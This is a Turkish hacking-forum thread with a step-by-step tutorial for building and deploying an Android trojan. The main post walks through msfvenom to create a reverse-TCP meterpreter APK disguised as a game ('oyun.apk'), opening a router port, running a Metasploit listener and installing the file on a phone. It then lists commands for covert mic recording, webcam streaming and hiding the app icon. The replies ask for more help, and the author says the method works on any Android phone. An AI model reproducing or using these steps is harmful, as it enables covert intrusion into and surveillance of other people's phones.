Android telefonlara sızma

EnesKocyigit

Yeni üye
1 Eki 2017
3
0
Merhaba, bugün sizlere android telefonlara TROJAN atarak sızmaktan bahsedeceğim.
-------------------------------------------------------------------------------

Ilk olarak kalide terminalimizi açıyoruz.
Ardından komut satırına
Kod:
ifconfig
yazıyoruz.

İfconfig yazdıkdan sonra karşımıza ip bilgilerimiz gelecek.

2d1RkLQ.png

Benim laptopumda internet kablosu takılı olduğundan dolayı bende wlan0 ve eth0 var.
Siz istediğiniz bir ip yi seçin ama bu ip yi modem arayüzünden port açarken sabitlemeyi unutmayın.
Ben eth0'ı kullanıyorum, sizdede masaüstü ise eth0 olacaktır.

Ardından İNET deki ip adresimi alıyorum (192.168.1.23).

fvZEt9S.png

Bu ip adresimi öğrendikten sonra modem arayüzüme girip 5465 adında bir port açıyoruz.

Port açtıktan sonra komut satırına
Kod:
msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.1.23 LPORT=5465 R > /root/Masaüstü/oyun.apk
yazıyoruz, oyun.apk dosyamızın ismi olacak.

Bu işlemi yaptıktan sonra,
Kod:
msfconsole
yazıyoruz.

Msfconsole açıldıktan sonra
Kod:
use multi/handler
yazıyoruz.

Ardından
Kod:
set payload android/meterpreter/reverse_tcp
yazıyoruz.

Sonra
Kod:
set LHOST [COLOR=red]ifconfig'deki ip adresiniz[/COLOR]
yazıp, aynı işlemi Port içinde yapıyoruz.
Kod:
set LPORT 5465
yazdıktan sonra
Kod:
exploit
yazıyoruz.

Ardından yaptığımız trojan'ı root dosyasından çıkarıp telefona yükleyip açıyoruz.
Msfconsole'da bağlantı olduğunda gözükecektir, bağlantı geldiğinde
Kod:
help
yazarak komutları görebilirsiniz.

-----------------------------------------------------------------------------------------------------
record_mic => Anlık ses kaydetme.
webcam_stream => Anlık olarak kamera görüntüleme.
hide_app_icon => Bu telefondaki Trojan'ı gizler en önemlisidir.
app_run => Uygulama açar.
app_list => Telefondaki uygulamaları gösterir.

-----------------------------------------------------------------------------------------------------
Hatam olduysa yorum olarak belirtirseniz sevinirim ilk konularımdan birisi.

Son düzenleme:

FOR3X

Yeni üye
29 Mar 2020
2
0
Selam hocam konu yararlı fakat modem arayüzünden port açmayı resimli olarak anlatırsanız daha yararlı olucaktır kolay gelsin

Sencertekin1

Yeni üye
6 Nis 2020
9
0
Merhabalar kardeşim başlığı okuduğumda telefondan karşı telefona gönderip kodları yazdığınızda karşı telefonda bişeyler yapıyoruz sandım. Yazıyı okuduğumda da ilk öyle sandım (teknik çalışma ve emeğin çok iyi ama anlatımın çalışmanın değerini azaltmış) fakat bu kodlar kendi telefonumuz için galiba, kendi telefonumuza ne için sızalımki bana amaç anlamsız geldi

EnesKocyigit

Yeni üye
1 Eki 2017
3
0
Yararli konu hocam windows icin olani varmi
Merhaba, windows için varmıdır bilmem ben windows işletim sistemi kullanmıyorum forumda araştırma yaparsanız elbetki bulursunuz iyi günler dilerim :)

Merhabalar kardeşim başlığı okuduğumda telefondan karşı telefona gönderip kodları yazdığınızda karşı telefonda bişeyler yapıyoruz sandım. Yazıyı okuduğumda da ilk öyle sandım (teknik çalışma ve emeğin çok iyi ama anlatımın çalışmanın değerini azaltmış) fakat bu kodlar kendi telefonumuz için galiba, kendi telefonumuza ne için sızalımki bana amaç anlamsız geldi

Merhaba, konu tüm android telefonlara sızmayı kapsamaktadır zaten portta bunun için açılıyor sen bir telefonda çalıştırdığında port sana köprü açıyor ve telefona direkt sızmanı sağlıyor, ben konuda bir telefona sızmadım çünkü ülke kanunlarımız buna izin vermiyor kendi telefonumda arızalı, zaten help yazarak tüm kullanımlara bakabilirsiniz.

Selam hocam konu yararlı fakat modem arayüzünden port açmayı resimli olarak anlatırsanız daha yararlı olucaktır kolay gelsin

Bu konu hakkında fazlaca video var, eğer video çekseydim sizin modem markanız ila uyuşmadığından dolayı zaten bir işinize yaramayacaktı ondan dolayı internetten aramanız en sağlıklı yol olacaktır, iyi günler dilerim :)

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.